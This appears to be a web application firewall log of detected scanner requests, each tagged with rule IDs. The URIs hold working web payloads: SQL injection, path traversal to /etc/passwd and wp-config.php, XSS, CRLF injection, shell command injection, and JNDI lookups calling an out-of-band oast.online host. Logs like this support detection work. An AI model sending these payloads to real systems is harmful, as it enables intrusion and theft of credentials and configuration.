Packet [277]	Uri [/web/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b']	Nattacks [14 ]	Signatures	[933161]	[942140]	[942190]	[942110]	[942150]	[942200]	[942310]	[942330]	[942410]	[942480]	[942430]	[942440]	[942431]	[942460]
Packet [280]	Uri [/web/website/lang/en_US?r=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [282]	Uri [/web/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [6 ]	Signatures	[920230]	[920272]	[942270]	[942361]	[942430]	[942431]
Packet [285]	Uri [/web/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [287]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [288]	Uri [/web/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [290]	Uri [/web/download?type=files&filename=../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [291]	Uri [/web/%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [297]	Uri [/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E]	Nattacks [9 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942180]	[942260]	[942431]	[942460]	[942511]
Packet [298]	Uri [/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [299]	Uri [/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [302]	Uri [/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [306]	Uri [/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [308]	Uri [/web/wp-content/themes/.git/config]	Nattacks [1 ]	Signatures	[930130]
Packet [310]	Uri [/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[920272]	[930100]
Packet [313]	Uri [/web/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [315]	Uri [/web/download?type=files&filename=../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [316]	Uri [/web/%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [321]	Uri [/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [324]	Uri [/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [325]	Uri [/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[920272]	[930100]
Packet [327]	Uri [/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [333]	Uri [/web/download.php?file=../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [334]	Uri [/web/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [339]	Uri [/web/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [340]	Uri [/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [343]	Uri [/web/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]
Packet [344]	Uri [/web/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [345]	Uri [/web/wp-config.php]	Nattacks [1 ]	Signatures	[930130]
Packet [346]	Uri [/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [348]	Uri [/web/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [349]	Uri [/web/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com]	Nattacks [1 ]	Signatures	[931130]
Packet [354]	Uri [/web/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E]	Nattacks [9 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942180]	[942260]	[942431]	[942460]	[942511]
Packet [355]	Uri [/web/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [359]	Uri [/web/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E]	Nattacks [9 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942180]	[942260]	[942431]	[942460]	[942511]
Packet [360]	Uri [/web/download.php?file=../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [367]	Uri [/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [369]	Uri [/web/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [373]	Uri [/web/file=C:%5CWindows%5Cwin.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [374]	Uri [/web/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [375]	Uri [/web/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [379]	Uri [/web/%0a/example.com/]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [384]	Uri [/web/index.php?page=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [385]	Uri [/web/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]
Packet [386]	Uri [/web/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [387]	Uri [/web/%0d/example.com/]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [389]	Uri [/web/wp-config.php]	Nattacks [1 ]	Signatures	[930130]
Packet [390]	Uri [/web/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[941150]	[941320]	[942431]
Packet [391]	Uri [/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [392]	Uri [/web/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]
Packet [393]	Uri [/web/.wp-config.php.swp]	Nattacks [1 ]	Signatures	[920440]
Packet [394]	Uri [/web/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [395]	Uri [/web/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1]	Nattacks [4 ]	Signatures	[942190]	[942150]	[942410]	[942431]
Packet [396]	Uri [/web/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com]	Nattacks [1 ]	Signatures	[931130]
Packet [398]	Uri [/web/msa/../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [403]	Uri [/web/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com]	Nattacks [1 ]	Signatures	[931130]
Packet [407]	Uri [/web/js/../../../../../../../../etc/passwd%00.jpg]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]
Packet [411]	Uri [/web/wp-config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [414]	Uri [/web/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [415]	Uri [/web///////../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [416]	Uri [/web/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [417]	Uri [/web/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [418]	Uri [/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [421]	Uri [/web/file=C:%5CWindows%5Cwin.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [426]	Uri [/web/%0d/example.com/]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [428]	Uri [/web/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini]	Nattacks [2 ]	Signatures	[930110]	[930110]
Packet [431]	Uri [/web/msa/../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [432]	Uri [/web/%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [433]	Uri [/web/e/ViewImg/index.html?url=javascript:alert(document.domain)]	Nattacks [2 ]	Signatures	[941170]	[941210]
Packet [435]	Uri [/web/js/../../../../../../../../etc/passwd%00.jpg]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]
Packet [439]	Uri [/web/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1]	Nattacks [4 ]	Signatures	[942190]	[942150]	[942410]	[942431]
Packet [441]	Uri [/web/%00/example.com/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [444]	Uri [/web///////../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [446]	Uri [/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [447]	Uri [/web/seeyon/thirdpartyController.do.css/..;/ajax.do]	Nattacks [1 ]	Signatures	[930110]
Packet [449]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [450]	Uri [/web/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [451]	Uri [/web/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [452]	Uri [/web/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[941150]	[941320]	[942431]
Packet [453]	Uri [/web/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com]	Nattacks [1 ]	Signatures	[931130]
Packet [454]	Uri [/web/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [456]	Uri [/web/wp-config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [457]	Uri [/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [458]	Uri [/web/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [461]	Uri [/web/static///////../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [462]	Uri [/web/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[941150]	[941320]	[942431]
Packet [464]	Uri [/web/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942260]	[942431]	[942460]
Packet [465]	Uri [/web/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[932100]	[942460]
Packet [468]	Uri [/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [469]	Uri [/web/wp-config.old]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [470]	Uri [/web/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [471]	Uri [/web/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [472]	Uri [/web///../app.js]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [473]	Uri [/web/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1 ]	Signatures	[941110]
Packet [474]	Uri [/web/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("25SnmL4gMrJaXMbXMymwGI3wvBU")>]	Nattacks [7 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]	[942460]
Packet [476]	Uri [/web/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [477]	Uri [/web/plus/carbuyaction.php?dopost=return&code=../../]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [480]	Uri [/web/%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [481]	Uri [/web/e/ViewImg/index.html?url=javascript:alert(document.domain)]	Nattacks [2 ]	Signatures	[941170]	[941210]
Packet [484]	Uri [/web/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E]	Nattacks [1 ]	Signatures	[941110]
Packet [487]	Uri [/web/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1 ]	Signatures	[920272]
Packet [488]	Uri [/web/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [489]	Uri [/web/%00/example.com/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [493]	Uri [/web/seeyon/thirdpartyController.do.css/..;/ajax.do]	Nattacks [1 ]	Signatures	[930110]
Packet [495]	Uri [/web/%09/example.com/]	Nattacks [1 ]	Signatures	[920272]
Packet [500]	Uri [/web/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [502]	Uri [/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [503]	Uri [/web/webadmin/authportal/bounce.php?url=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [505]	Uri [/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [506]	Uri [/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [507]	Uri [/web/%5C%5Cexample.com/%252e%252e%252f]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [508]	Uri [/web/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6]	Nattacks [8 ]	Signatures	[920230]	[941100]	[941110]	[941160]	[941320]	[942130]	[942260]	[942431]
Packet [509]	Uri [/web/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[941150]	[941320]	[942431]
Packet [510]	Uri [/web/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942260]	[942431]	[942460]
Packet [514]	Uri [/web/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [515]	Uri [/web/wp-config.old]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [516]	Uri [/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [517]	Uri [/web///../app.js]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [519]	Uri [/web/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1 ]	Signatures	[941110]
Packet [520]	Uri [/web/%5Cexample.com]	Nattacks [1 ]	Signatures	[920440]
Packet [521]	Uri [/web/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [522]	Uri [/web/plus/carbuyaction.php?dopost=return&code=../../]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [524]	Uri [/web/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [525]	Uri [/web/bitrix/rk.php?goto=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [527]	Uri [/web/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [528]	Uri [/web/../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [529]	Uri [/web/wp-config.txt]	Nattacks [1 ]	Signatures	[930130]
Packet [533]	Uri [/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8acjap9m8v98g1htghgcekcuoyyyyync.oast.online/a%7D]	Nattacks [5 ]	Signatures	[932110]	[932130]	[932160]	[942431]	[942460]
Packet [534]	Uri [/web/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [535]	Uri [/web/wp-content/uploads/mc4wp-debug.log]	Nattacks [1 ]	Signatures	[920440]
Packet [537]	Uri [/web/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [538]	Uri [/web/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E]	Nattacks [1 ]	Signatures	[941110]
Packet [539]	Uri [/web/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1 ]	Signatures	[920272]
Packet [541]	Uri [/web/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [542]	Uri [/web/%0DSet-Cookie:crlfinjection=crlfinjection]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [545]	Uri [/web/index.php/Home/uploadify/fileList?type=.+&path=../../../]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [547]	Uri [/web/index.php?id=50&file=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [553]	Uri [/web/wp-config.php.txt]	Nattacks [1 ]	Signatures	[930130]
Packet [555]	Uri [/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [557]	Uri [/web/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6]	Nattacks [8 ]	Signatures	[920230]	[941100]	[941110]	[941160]	[941320]	[942130]	[942260]	[942431]
Packet [559]	Uri [/web/webadmin/authportal/bounce.php?url=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [563]	Uri [/web/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://c8acjap9m8v98g1htghgcekcuoeyyyynq.oast.online%23.salesforce.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [566]	Uri [/web/%5Cexample.com]	Nattacks [1 ]	Signatures	[920440]
Packet [567]	Uri [/web/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=]	Nattacks [7 ]	Signatures	[921180]	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [570]	Uri [/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8acjap9m8v98g1htghgcekcuoyyyyync.oast.online/a%7D]	Nattacks [5 ]	Signatures	[932110]	[932130]	[932160]	[942431]	[942460]
Packet [572]	Uri [/web/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [573]	Uri [/web/%5cexample.com/%2f%2e%2e]	Nattacks [2 ]	Signatures	[930110]	[930110]
Packet [581]	Uri [/web/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [582]	Uri [/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [584]	Uri [/web/bitrix/redirect.php?event3=352513&goto=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [585]	Uri [/web/%5chttp://192.168.1.104example.com/%2f%2e%2e]	Nattacks [2 ]	Signatures	[930110]	[930110]
